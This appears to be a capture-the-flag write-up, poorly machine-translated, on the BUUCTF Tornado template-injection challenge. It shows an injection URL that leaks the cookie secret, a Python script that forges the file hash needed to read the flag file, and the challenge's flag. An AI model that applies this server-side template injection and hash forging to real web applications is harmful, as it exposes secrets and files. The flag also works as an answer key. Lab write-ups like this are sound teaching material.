1. gave three tips
flag in / fllllllllllllag here
Render + tornado these two things, obviously python web
Follow the prompts to flag the folder, add the path to visit, I found it impossible to access, be a mistake to jump to page
Here, the presence began to suspect that it was not a template injection
Input data are treated as a code execution, for example, {1} + {1} 2 echo returns, of course, the normal situation seldom. Is generally a function or keyword will be executed
First try
Official website turned a bit, probably these functions
Try one by one
The first escape was carried out directly
http://9cc83977-4b02-44c3-93d1-b1f6d026f845.node1.buuoj.cn/error?msg={{escape}}
Here the prompts, we need a cookie
Reference wp, chefs explained the
Next, calculate the hash according to hint tips
#!-*-coding:utf-8 -*-
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = '01d3ae36-9d9e-44f4-b25e-405eda25b369'
print(md5(cookie_secret + md5(filename)))
if __name__ == '__main__':
filehash()
742267cca0cd702fac6bbaeb947cd61e bring in access, the flag
Flag: flag{94b1f826-b51b-4822-986f-bc718c19560b}
Reference article:
http://ch.vksec.com/2017/06/tornado.html
https://blog.csdn.net/weixin_44677409/article/details/94410580
https://tornado.readthedocs.io/en/latest/web.html#tornado.web.RequestHandler
https://www.kancloud.cn/kancloud/python-basic/41712
https://www.cnblogs.com/cimuhuashuimu/p/11544455.html